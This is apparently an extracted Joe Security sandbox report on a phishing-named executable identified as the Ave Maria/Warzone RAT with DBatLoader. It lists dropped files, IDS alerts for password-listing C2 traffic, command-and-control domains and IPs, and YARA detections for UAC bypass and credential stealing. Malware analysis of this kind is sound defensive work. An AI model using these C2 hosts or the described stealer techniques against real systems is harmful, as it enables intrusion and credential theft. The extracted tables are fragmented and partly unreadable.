C:\Users\user\AppData\Roaming\.JmyHai.tmp
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
C:\Users\user\AppData\Roaming\JJrxrvA.tmp
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Encrypted: false
SSDEEP: 1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1
MD5: D5D29F3050E6C920ECA7B7276AB537CE
SHA1: CE24853BBE0BCC044B2216385612CBA2A754E4D4
SHA-256: C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB
SHA-512: 3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8
C
Malicious: false
Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":
{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},
"network_time":{"network_time_mapping":{"local":1.601451012154773e+12,"network":1.601451004e+12,"ticks":765205613.0,"uncertainty":4222325.0}},"os_crypt":{"encry
pted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPq
IYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqp
s4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},
"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d
\Device\ConDrv
Process: C:\Windows\SysWOW64\netsh.exe
Category: dropped
Size (bytes): 7
Encrypted: false
SSDEEP: 3:t:t
MD5: F1CA165C0DA831C9A17D08C4DECBD114
SHA1: D750F8260312A40968458169B496C40DACC751CA
SHA-256: ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512: 052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious: false
Preview: Ok.....
MD5: c9ee1d6a90be7524b01814f48b39b232
SHA1: 12c080569f9bf82e0c1538bc9caef4de06db5bfd
SHA256: 6da3064773edf094f014b7aa13f2e3f74634f62552a91f88bf306f962bbf0563
SHA512: a616fc149d7ed3ed199aab73b68da13df0304c310d7aa85d8e5e8a14c37070835e1c5f04631c03c270b6fc803c469ee35350049b930d6f03f6a320fe02348acb
SSDEEP: 24576:XWWH7k2z/m1uA7Zo4pdUtVSn52pAf2rDNtl2aCHXeO:XWrqMpd+Sn52KN5
TLSH: 5C059E66F2904937D073193C4D475B54A839BE113928E88A2BF92E4C5FF9B903A393D7
File Icon
Static PE Info
General
Entrypoint: 0x47a79c
Imagebase: 0x400000
DLL Characteristics:
TLS Callbacks:
OS Version Major: 4
OS Version Minor: 0
Entrypoint Preview
Instruction
push ebp
call 00007F8750AD4D69h
call 00007F8750B32549h
call 00007F8750B31FD0h
call 00007F8750B32538h
call 00007F8750B325ACh
call 00007F8750AD2BD7h
Data Directories
Name Virtual Address Virtual Size Is in Section
Sections
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
Resources
Name RVA Size Type Language Country
AUDIOES 0x8fc1c 0x3697c RIFF (little-endian) data, WAVE audio, Microsoft English United States
PCM, 16 bit, stereo 44100 Hz
RT_GROUP_CURSOR 0xcf5b0 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_GROUP_CURSOR 0xcf5c4 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_GROUP_CURSOR 0xcf5d8 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_GROUP_CURSOR 0xcf5ec 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_GROUP_CURSOR 0xcf600 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_GROUP_CURSOR 0xcf614 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_GROUP_CURSOR 0xcf628 0x14 Lotus unknown worksheet or configuration, English United States
revision 0x1
RT_MANIFEST 0xcfb14 0x245 XML 1.0 document, ASCII text, with CRLF line English United States
terminators
Imports
DLL Import
kernel32.dll Sleep
comdlg32.dll GetOpenFileNameA
URL AddMIMEFileTypesPS
Possible Origin
Language of compilation system Country where language is spoken Map
German Germany
185.222.57.173192.168.2. TCP 285189 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 4980 49772 185.222.57.1 192.168.2.4
44980497722851895 5 73
07/25/22-
15:51:28.258544
192.168.2.4185.222.57.17 TCP 285195 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse 49772 4980 192.168.2.4 185.222.57.1
34977249802851951 1 73
07/25/22-
15:52:39.729742
192.168.2.4185.222.57.17 TCP 285194 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 49772 4980 192.168.2.4 185.222.57.1
34977249802851946 6 73
07/25/22-
15:53:08.297448
192.168.2.4185.222.57.17 TCP 285194 ETPRO TROJAN Ave Maria/Warzone RAT VNC GetModule 49772 4980 192.168.2.4 185.222.57.1
34977249802851948 8 73
07/25/22-
15:52:28.788965
185.222.57.173192.168.2. TCP 285194 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 4980 49772 185.222.57.1 192.168.2.4
44980497722851945 5 73
07/25/22-
15:53:08.296970
185.222.57.173192.168.2. TCP 285193 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand 4980 49772 185.222.57.1 192.168.2.4
44980497722851933 3 73
07/25/22-
15:52:28.734171
Total Packets: 55
• 53443(DNS)
• (HTTPS)
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Jul 25, 2022 15:50:51.960721016 CEST 192.168.2.4 8.8.8.8 0x5318 Standard query morientlines.com A (IP address) IN (0x0001)
(0)
Jul 25, 2022 15:51:28.172810078 CEST 192.168.2.4 8.8.8.8 0x9a0b Standard query mosesmanse A (IP address) IN (0x0001)
(0) rvernew.ho
pto.org
Jul 25, 2022 15:51:30.221482992 CEST 192.168.2.4 8.8.8.8 0x1e7 Standard query morientlines.com A (IP address) IN (0x0001)
(0)
Jul 25, 2022 15:51:38.263119936 CEST 192.168.2.4 8.8.8.8 0x8b62 Standard query morientlines.com A (IP address) IN (0x0001)
(0)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Jul 25, 2022 8.8.8.8 192.168.2.4 0x5318 No error (0) morientlines.com 103.11.189.121 A (IP address) IN
15:50:52.138900995 CEST (0x0001)
Jul 25, 2022 8.8.8.8 192.168.2.4 0x9a0b No error (0) mosesmanse 185.222.57.173 A (IP address) IN
15:51:28.192398071 CEST rvernew.ho (0x0001)
pto.org
Jul 25, 2022 8.8.8.8 192.168.2.4 0x1e7 No error (0) morientlines.com 103.11.189.121 A (IP address) IN
15:51:30.411653042 CEST (0x0001)
Jul 25, 2022 8.8.8.8 192.168.2.4 0x8b62 No error (0) morientlines.com 103.11.189.121 A (IP address) IN
15:51:38.473285913 CEST (0x0001)
morientlines.com
kBytes
Timestamp Direction Data
transferred
Destination
Session ID Source IP Source Port Destination IP Process
Port
kBytes
Timestamp Direction Data
transferred
Destination
Session ID Source IP Source Port Destination IP Process
Port
kBytes
Timestamp Direction Data
transferred
kBytes
Timestamp Direction Data
transferred
Statistics
Behavior
• Scan_IMG-Purchase Order.exe
• cmd.exe
• conhost.exe
• cmd.exe
• conhost.exe
• Scan_IMG-Purchase Order.exe
• Scxozm.exe
• 159.exe
• netsh.exe
• conhost.exe
• Scxozm.exe
• rdpvideominiport.sys
• WerFault.exe
• rdpdr.sys
• tsusbhub.sys
• Scxozm.exe
• Scxozm.exe
System Behavior
General
Target ID: 0
Imagebase: 0x400000
Yara matches: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296980990.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268671897.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277014378.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.268203543.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268203543.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305432929.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 46 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300337710.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294526843.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277440204.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281348546.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268241280.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295497323.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301828829.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275145009.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.279199085.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281738154.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299596147.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270029546.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289989399.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000000.00000000.250608473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267368426.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294755789.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274813807.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271274314.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.291553342.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298011694.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303407343.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298701516.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276287632.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271126241.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302793701.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.266958876.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271192051.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270154831.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277103824.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278565219.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267720341.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.293913878.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268615561.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267453306.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305344120.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301321070.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273534772.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303828660.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271811539.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301011209.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302982895.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299519775.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270356285.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305070113.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.267868293.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Reputation: low
File Activities
Registry Activities
Key Value Created
Key Path Name Type Data Completion Count Source Address Symbol
General
Target ID: 12
Path: C:\Windows\SysWOW64\cmd.exe
Imagebase: 0x1190000
Reputation: high
File Activities
File Path Access Attributes Options Completion Count Source Address Symbol
File Read
File Path Offset Length Completion Count Source Address Symbol
General
Target ID: 13
Path: C:\Windows\System32\conhost.exe
Imagebase: 0x7ff647620000
Reputation: high
General
Target ID: 14
Path: C:\Windows\SysWOW64\cmd.exe
Imagebase: 0x1190000
Reputation: high
File Activities
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Copyright Joe Security LLC 2022 Page 53 of 74
File Path Access Attributes Options Completion Count Source Address Symbol
General
Target ID: 15
Path: C:\Windows\System32\conhost.exe
Imagebase: 0x7ff647620000
Reputation: high
General
Target ID: 17
Imagebase: 0x400000
Yara matches: Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.329850284.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.329850284.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330628254.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330628254.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.318865751.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.318450222.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330601910.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.319731726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.319289464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000002.527601227.0000000000912000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000002.527601227.0000000000912000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000002.521632328.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 54 of 74
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330520279.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000011.00000002.527059005.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000003.330204265.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330232103.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330232103.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.318046081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000002.530212616.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000002.532617862.00000000057C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000011.00000000.320210057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000011.00000002.526568762.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
